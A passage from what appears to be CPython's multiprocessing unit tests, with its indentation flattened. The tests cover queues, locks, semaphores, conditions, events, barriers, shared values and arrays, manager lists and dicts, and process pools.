# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
